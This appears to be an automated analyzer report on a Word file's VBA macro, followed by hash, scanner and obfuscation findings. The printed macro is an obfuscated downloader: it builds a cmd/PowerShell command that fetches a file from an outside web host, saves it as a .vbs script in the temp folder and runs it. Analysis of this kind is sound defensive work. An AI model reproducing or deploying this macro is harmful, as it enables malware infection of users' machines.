nwDSUqhTQCKx8QG4mwlFE6JSn21Y3L7oMGnUmy8skgJyfOqCbAd = "3RLivxKEmgZ2X1Fi"
Do While 699 < 4
Select Case hEN7
Case "ÝØ° ̤´§Ãk", "ßÐ�???µ´¸uq ©?¡", "ÓÉ?¤áw?¦ì?§xu?¼©¥ÜÇxÔÊ "
zxcbnmmf1 = "ß·?Ôµ�??Êh§?vµ¡�?À¦?Ѫa"
Case "×±¸°ºo·¼¶¡?¥?¯µ?", "ÛÖ°?á�¼?都?}?Æ??©´�ÀËz??ß}¦~s?"
zxcbnmmf2 = "ç¤?Ϭ��«ì{§f¥¾¿??ã¸?È©[º?æ{"
Case "ÛǸ¾Â??²¶?]", "å±?¦³?|?å???j?©p?"
zxcbnmmf3 = "áÕ?Ê ??¦Ù??�¢�?µ?ìÊz?Ôr?�Ö ]¨j??v"
Case Else
zxcbnmmf4 = "hf8yFWYbYyZH3dgZFsuEXkfq9DGCf"
End Select
Exit Do
Randomize
Loop
Dim t2ahF As String
Dim v3yvuWtLNgZC As Integer
v3yvuWtLNgZC = 4364
t2ahF = "3RLivxKEmgZ2X1Fi"
Do While 374 < 4
Select Case o1z5TWsY
Case "â¤?«Üq²�¥j?_£¹ºrxº±¶³µ?¯ræ?", "×Ð~Ç", "쪼?Ö�??Â~¦z¥?Á?�"
zxcbnmmf1 = "ÓÜ?¬Ð??vëu??©? ²³à¼¿µ?n³§¸ w©§??q?"
Case "ÚÉ°ÅÁoÂ?Þ", "ì±?Å®¢??á?|{???¥«"
zxcbnmmf2 = "ëѶ�«n¤�Ϩ?s?°Áª¬³º?¯"
Case "ãìȿ?~ªÍm^ �??²©µ¬???t~¸?�??®�?«ê?", "ì??ª?qÀzãj???¨´p?¸´´?Á µ?¶??"
zxcbnmmf3 = "é??ª ?�?¾¬??h¶??²Äȸƻ¢¤®äk]?"
Case Else
zxcbnmmf4 = "iUKZp"
End Select
Exit Do
Randomize
Loop
Dim ohIZF32AeVpQ1dNONCDs8g2fyGP99xt4br As String
Dim bwVj As Integer
bwVj = 4364
ohIZF32AeVpQ1dNONCDs8g2fyGP99xt4br = "3RLivxKEmgZ2X1Fi"
Do While 568 < 3
Select Case lvRSz1st
Case "ÙÖ³?Õqµµ½?£???¶�©¥¦ б ", "Ö·²±Î?", "æ·??â`?·¥"
zxcbnmmf1 = "êª??Ïc??½?tck"
Case "Ö¯¬Ò?£�zÇ�^?j{Ä£µ¨¹", "ÞÄ�Ð~Áz¦¤`bk�?¨â˪¿Þ?£rÏv"
zxcbnmmf2 = "ÙÈ"
Case "ìÛ«È×¢Â?¸e?�k?Æv", "ìÒv¨¹£?°¬§¡b¡?À§¡£»?°À|?©îyy?"
zxcbnmmf3 = "챩ƶ?¾¦·®p?{? ®"
Case Else
zxcbnmmf4 = "xZS91A58Uo"
End Select
Exit Do
Randomize
Loop
Dim aAGdUOjH8u1isHG2AV As String
Dim xzfIyLJ As Integer
xzfIyLJ = 4364
aAGdUOjH8u1isHG2AV = "3RLivxKEmgZ2X1Fi"
a = Left("EHulfcKMKk DvwUMAgSI TEXpYnEPBt", 1)
'Right function
b = Left("PHulfcKMKk DvwUMAgSI TEXpYnEPBt", 1)
c = Left("OHulfcKMKk DvwUMAgSI TEXpYnEPBt", 1)
f = Right("HHulfcKMKk DvwUMAgSI TEXpYnEPBT", 1)
'Mid function
q = Mid("EHulfcKMKk DvwUMAgSI TEXpYnEPBt", 1, 11)
'Split function
d = Split("EHulfcKMKk DvwUMAgSI TEXpYnEPBt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
Dim lop
lop = "/c"
zUd2G4VyMuBZAFH = "cmd " & lop & _
" " & _
"" & _
b & c & Chr((Abs(-119))) & a & Chr((Abs(-114))) & Chr((Abs(-115))) & Chr((Abs(-104))) & a & Chr(108) & Chr(107.6) & _
ChrW(Log(1.38211382113821) + Log(0.948051948051948) + 39.3997318990275) & ChrW(Log(2.1219512195122) + Log(0.818181818181818) + 77.1183346435119) & ChrW(Log(0.715447154471545) - Log(0.766233766233766) + 100.738579562946) & ChrW(Log(2.21138211382114) + Log(0.376623376623377) + 118.852891880944) & ChrW(Log(2.00813008130081) - Log(0.480519480519481) + 43.239908509535) & _
"Object " & _
ChrW(Log(1.24390243902439) - Log(0.506493506493506) + 81.7715026582559) & ChrW(Log(0.788617886178862) + Log(0.38961038961039) + 121.850081417061) & ChrW(Log(0.609756097560976) + Log(1) + 115.164696241836) & ChrW(Log(0.739837398373984) - Log(0.675324675324675) + 115.578763145583) & ChrW(Log(0.894308943089431) + Log(0.948051948051948) + 100.835049970285) & ChrW(Log(0.845528455284553) + Log(0.675324675324675) + 109.230355159503) & _
ChrW(Log(0.300813008130081) + Log(0.467532467532468) + 47.6315529261258) & ChrW(Log(0.967479674796748) + Log(0.467532467532468) + 78.4633473456585) & ChrW(Log(1.31707317073171) + Log(0.857142857142857) + 100.548738699967) & ChrW(Log(0.658536585365854) + Log(0.402597402597403) + 116.997553418069) & ChrW(Log(1.77235772357724) - Log(0.753246753246753) + 44.8143268812761) & _
ChrW(Log(0.32520325203252) + Log(0.220779220779221) + 89.3038969790559) & ChrW(Log(2.04065040650406) + Log(0.415584415584416) + 100.834800935295) & ChrW(Log(1.49593495934959) - Log(0.844155844155844) + 97.0978304458054) & _
ChrW(Log(2.34959349593496) - Log(0.207792207792208) + 64.2445409676461) & ChrW(Log(0.422764227642276) + Log(0.662337662337662) + 108.94292042592) & ChrW(Log(1.61788617886179) - Log(0.753246753246753) + 103.905517119341) & ChrW(Log(2.21138211382114) - Log(0.909090909090909) + 99.7810721092721) & ChrW(Log(0.747967479674797) - Log(0.467532467532468) + 109.200109294926) & ChrW(Log(1.41463414634146) - Log(0.662337662337662) + 114.911149267029) & _
ChrW(Log(0.975609756097561) - Log(0.350649350649351) + 39.646724056741) & ChrW(Log(0.341463414634146) + Log(0.181818181818182) + 48.4492628293275) & _
ChrW(Log(0.83739837398374) + Log(0.285714285714286) + 69.1002183356381) & ChrW(Log(0.682926829268293) + Log(0.519480519480519) + 111.706293524269) & ChrW(Log(0.926829268292683) - Log(0.467532467532468) + 117.98569942358) & ChrW(Log(1.26829268292683) + Log(0.883116883116883) + 109.5566260648) & ChrW(Log(1.40650406504065) + Log(0.298701298701299) + 108.537203966799) & ChrW(Log(1.02439024390244) - Log(1.02597402597403) + 110.671544879034) & ChrW(Log(1.38211382113821) - Log(0.896103896103896) + 96.2366870010657) & ChrW(Log(0.804878048780488) + Log(0.25974025974026) + 101.235137653538) & ChrW(Log(0.75609756097561) - Log(0.662337662337662) + 69.5376050730898) & ChrW(Log(1.91056910569106) + Log(0.844155844155844) + 104.192016993186) & ChrW(Log(1.17886178861789) - Log(0.454545454545455) + 106.716993252588) & ChrW(Log(0.75609756097561) + Log(0.974025974025974) + 100.975902170537) & _
ChrW(Log(1.32520325203252) + Log(0.25974025974026) + 40.7365073028653) & _
"'" & _
"http://orders.e-transaction.website/1x1/VBCvBflat2CmajorBatchKEYx.jpg" & _
"','" & _
"%" & ChrW(Log(1.4390243902439) + Log(0.753246753246753) + 115.589397034106) & ChrW(Log(1.35772357723577) - Log(0.324675324675325) + 99.2392609459702) & ChrW(Log(0.764227642276423) - Log(0.402597402597403) + 108.029071355734) & ChrW(Log(2.1219512195122) + Log(0.597402597402597) + 111.432827973414) & "%" & _
"\wQ5OcWI8lmlJZE.vbs');" & _
ChrW(Log(1.27642276422764) + Log(0.467532467532468) + 115.186225033422) & ChrW(Log(1.83739837398374) + Log(0.701298701298701) + 115.41647073139) & ChrW(Log(0.804878048780488) + Log(0.987012987012987) + 96.9001365868052) & ChrW(Log(0.252032520325203) - Log(0.454545454545455) + 114.259739790523) & ChrW(Log(2.13008130081301) - Log(0.74025974025974) + 114.613085697592) & " " & _
"%" & ChrW(Log(1.4390243902439) + Log(0.753246753246753) + 115.589397034106) & ChrW(Log(1.35772357723577) - Log(0.324675324675325) + 99.2392609459702) & ChrW(Log(0.764227642276423) - Log(0.402597402597403) + 108.029071355734) & ChrW(Log(2.1219512195122) + Log(0.597402597402597) + 111.432827973414) & "%" & _
"\wQ5OcWI8lmlJZE.vbs"
d7RdxChdL9FYMZkThCyVVa4 (zUd2G4VyMuBZAFH)
End Sub
Private Sub dakoKCOS()
End Sub
Sub d7RdxChdL9FYMZkThCyVVa4(ZTBiIcAJJ As String)
While "wMdIKSkVAhsxAH" = "obHtnbgiOMbDU"
bZdwYIHwoqxFGVEEHBhihQVQjoPePwiPQbZHOA = 8.88143014062935E+30
yGrmQvhULeJFZVlMKENNksdh = "HipewwqGZicpeEUBTEzFrItePOCBnrGcKuJNr"
OhTyAmJXgAtMQodbByoLPiuoShczekvGJdqR = "sIHVrhCHbbRyjtKZgagnefTKJswFmCnx"
pIqhqXArgrG = 6.11922130360933E+20
Wend
k = "W"
k = Shell(ZTBiIcAJJ, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 62976 bytes |
SHA-256: 8da9a3c02d5f3fb7d43b7d3d7838b0b78310c249a0b159656fe5f401e0fbc988 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
308 of 561 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.